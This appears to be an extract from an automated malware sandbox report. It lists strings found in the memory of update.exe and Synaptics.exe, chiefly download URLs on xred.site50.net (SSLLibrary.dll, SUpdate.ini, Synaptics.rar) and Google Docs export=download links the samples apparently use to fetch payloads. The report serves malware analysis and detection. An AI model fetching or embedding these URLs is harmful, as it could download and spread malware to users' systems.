                                Source: update.exe, 00000006.00000003.1876203635.0000000000784000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                                Source: Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                                Source: update.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                                Source: Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                                Source: update.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                                Source: Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3039578670.000000001E76B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3025439050.000000001E142000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/0
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/5
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8.4
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/Denetleniyor...
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/GfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000076D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/GlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/GlEVGxuZVk&export=downloadX
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/a
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/cting...
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/eme
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/enetleniyor...
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/f4
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/GlEVGxuZVk&export=download4
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/h
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3039578670.000000001E76B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/user
                                Source: Synaptics.exe, 00000008.00000002.3039578670.000000001E76B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/l
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/load?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/m
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/me
                                Source: Synaptics.exe, 00000008.00000002.3039578670.000000001E76B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/p=
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/r
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/tleniyor...
                                Source: Synaptics.exe, 00000008.00000002.3063302398.000000002B5BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3089165847.000000003B3BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3053549341.0000000025E3E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                                Source: update.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                                Source: update.exe, 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                                Source: Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                                Source: update.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloX
                                Source: update.exe, 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000008.00000002.3009637208.000000001607E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3137223561.000000004F2FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3005442439.0000000013AFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2982429982.00000000092AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3131075644.000000004BD3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3088164109.000000003A9BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3018333201.000000001B43E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3130023989.000000004B33E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3138796459.000000004FF7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3065790692.000000002D33E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3070890636.00000000308FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3063834603.000000002BBFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3009908333.00000000162FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3063515800.000000002B83E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3116057112.0000000043A4E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3046254746.0000000021D3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2987039818.000000000D12E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3121988687.0000000046C4E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3082429260.00000000370BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2999431728.00000000100FE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#-
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#7
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#f
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026291010.00000000075FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                                Source: Synaptics.exe, 00000008.00000003.2026291010.00000000075D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$S
                                Source: Synaptics.exe, 00000008.00000002.3056672003.000000002787E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$w
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(?
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(JF
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(f
                                Source: Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-Y
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.c
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000863000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cn
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com.~
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.comr
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.goog
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.tr
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.xls
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download//
                                Source: Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download//L
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/1
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/4
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000078D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3129759300.000000004B0BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3130412436.000000004B6FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
